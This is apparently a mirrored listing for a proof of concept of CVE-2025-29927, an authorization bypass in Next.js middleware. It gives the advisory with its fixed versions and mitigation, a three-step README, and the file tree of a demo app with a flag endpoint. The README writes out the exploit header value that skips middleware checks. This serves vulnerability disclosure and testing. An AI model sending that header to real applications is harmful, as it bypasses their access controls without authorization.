CVE-2025-29927 PoC — Authorization Bypass in Next.js Middleware

Source

https://github.com/0xcucumbersalad/cve-2025-29927

Associated Vulnerability

Title:Authorization Bypass in Next.js Middleware (CVE-2025-29927)
Description:Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommend that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.

Readme

### CVE-2025-29927

1. go to /api/flag
2. add `x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware` as header
3. see response

File Snapshot


 [4.0K]  /data/pocs/8f25d5d5023c30164533442caa05cf9d43c2e5f7
├── [  92]  next.config.mjs
├── [ 526]  package.json
├── [196K]  package-lock.json
├── [ 135]  postcss.config.mjs
├── [ 174]  README.md
├── [4.0K]  src
│   ├── [4.0K]  app
│   │   ├── [4.0K]  api
│   │   │   └── [4.0K]  flag
│   │   │       └── [ 159]  route.ts
│   │   ├── [ 25K]  favicon.ico
│   │   ├── [4.0K]  fonts
│   │   │   ├── [ 66K]  GeistMonoVF.woff
│   │   │   └── [ 65K]  GeistVF.woff
│   │   ├── [ 413]  globals.css
│   │   ├── [ 742]  layout.tsx
│   │   └── [ 274]  page.tsx
│   └── [ 353]  middleware.ts
├── [ 407]  tailwind.config.ts
└── [ 578]  tsconfig.json

5 directories, 15 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!